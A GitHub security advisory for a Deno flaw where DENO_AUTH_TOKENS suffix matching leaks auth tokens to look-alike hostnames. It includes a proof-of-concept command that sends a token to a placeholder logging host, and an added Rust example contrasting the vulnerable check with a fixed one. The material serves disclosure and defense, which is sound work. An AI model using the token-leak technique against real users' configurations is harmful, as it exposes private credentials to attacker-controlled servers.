GHSA-5frw-4rwq-xhcr

Source
https://github.com/advisories/GHSA-5frw-4rwq-xhcr
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-5frw-4rwq-xhcr/GHSA-5frw-4rwq-xhcr.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5frw-4rwq-xhcr
Aliases
Published
2024-03-06T17:03:36Z
Modified
2024-03-21T18:25:42Z
Severity
  • 4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Summary
Deno's improper suffix match testing for DENO_AUTH_TOKENS
Details

Summary

Deno improperly checks whether an import specifier's hostname is equal to, or a subdomain of, a token's hostname, which can cause tokens to be sent to servers they should not be sent to: an auth token intended for example.com may also be sent to notexample.com.

Details

auth_tokens.rs uses a plain ends_with check on the hostname string, with no requirement that the match start at a label boundary (a preceding "."). That matches www.deno.land to a deno.land token as intended, but it also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

  • Set up a server that logs incoming requests (RequestBin will do), for example denovulnpoc.example.com.
  • Run DENO_AUTH_TOKENS=<token>@<left-truncated.domain> deno run https://<not-a-left-truncated.domain>, where the second hostname merely ends with the string of the first. For example: DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
  • Observe in the server's request log that the token intended only for the truncated domain (poc.example.com) is sent with the request to the full domain (denovulnpoc.example.com).
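The matching bug from the Details section and the PoC above, as an added example in Rust. This is not Deno's own code: it is a minimal model of the DENO_AUTH_TOKENS lookup with the suffix-only check beside a stricter label-boundary check, so you can see which hosts each one hands a token to. The entry format (token@host entries separated by ";"), the host extraction, the function names and the token values are all assumptions made for this example; port handling and the user:password form are left out.

```rust
// Added example, not Deno's code: a simplified model of DENO_AUTH_TOKENS
// host matching. Everything here (names, format, sample tokens) is assumed
// for illustration.

/// One entry parsed from DENO_AUTH_TOKENS, e.g. "a1b2c3d4e5f6@deno.land".
#[derive(Debug, Clone, PartialEq)]
pub struct AuthToken {
    pub host: String,
    pub token: String,
}

/// Parse the assumed `token@host;token@host` form. Entries without an '@'
/// or with an empty side are skipped. Hostnames are lower-cased so the
/// later comparisons are case-insensitive.
pub fn parse_auth_tokens(env: &str) -> Vec<AuthToken> {
    env.split(';')
        .filter_map(|entry| {
            let (token, host) = entry.trim().rsplit_once('@')?;
            if token.is_empty() || host.is_empty() {
                return None;
            }
            Some(AuthToken {
                host: host.to_ascii_lowercase(),
                token: token.to_string(),
            })
        })
        .collect()
}

/// Pull the host out of an `https://host[:port]/path` specifier.
/// Simplified (assumption): no IPv6 literals, no percent-encoding.
pub fn host_of(specifier: &str) -> Option<String> {
    let rest = specifier.split_once("://")?.1;
    let authority = rest.split(|c| c == '/' || c == '?' || c == '#').next()?;
    // Drop any user:pass@ prefix and any :port suffix.
    let host = authority.rsplit_once('@').map_or(authority, |(_, h)| h);
    let host = host.split(':').next()?;
    if host.is_empty() {
        None
    } else {
        Some(host.to_ascii_lowercase())
    }
}

/// The vulnerable lookup: a bare string-suffix test. Any host whose name
/// merely ends with the token host string gets the token, so
/// "im-in-ur-servers-attacking-ur-deno.land" matches a "deno.land" token.
pub fn token_for_vulnerable<'a>(tokens: &'a [AuthToken], specifier_host: &str) -> Option<&'a str> {
    let h = specifier_host.to_ascii_lowercase();
    tokens
        .iter()
        .find(|t| h.ends_with(&t.host))
        .map(|t| t.token.as_str())
}

/// The stricter lookup: the specifier host must equal the token host, or be
/// a subdomain of it, i.e. end with "." followed by the token host. The
/// "." forces the match onto a label boundary, which is what the suffix
/// test was missing.
pub fn token_for_fixed<'a>(tokens: &'a [AuthToken], specifier_host: &str) -> Option<&'a str> {
    let h = specifier_host.to_ascii_lowercase();
    tokens
        .iter()
        .find(|t| h == t.host || h.ends_with(&format!(".{}", t.host)))
        .map(|t| t.token.as_str())
}

fn main() {
    // Constructed sample configuration and specifiers (not real tokens).
    let tokens = parse_auth_tokens("a1b2c3d4e5f6@deno.land;s3cret@poc.example.com");
    let specifiers = [
        "https://deno.land/std/mod.ts",
        "https://www.deno.land/x/mod.ts",
        "https://im-in-ur-servers-attacking-ur-deno.land/mod.ts",
        "https://denovulnpoc.example.com/mod.ts",
    ];
    for s in specifiers {
        let host = host_of(s).expect("valid specifier");
        println!(
            "{host:45} suffix-only={:?} label-boundary={:?}",
            token_for_vulnerable(&tokens, &host),
            token_for_fixed(&tokens, &host)
        );
    }
}
```

Running the block prints one line per specifier; the two attacker-style hosts receive a token under the suffix-only check and nothing under the label-boundary check, while deno.land and www.deno.land receive their token under both.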

Impact

Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected: a remote module hosted on any hostname that ends with the string of a configured token's hostname, even without a "." label boundary, receives that token. Until Deno is upgraded to the fixed version (1.40.4), every token in DENO_AUTH_TOKENS should be treated as exposed to every host whose name ends with the token's configured host string.

References

Affected packages

crates.io / deno

Affected ranges (type: SEMVER)

  • Introduced: 1.8.0
  • Fixed: 1.40.4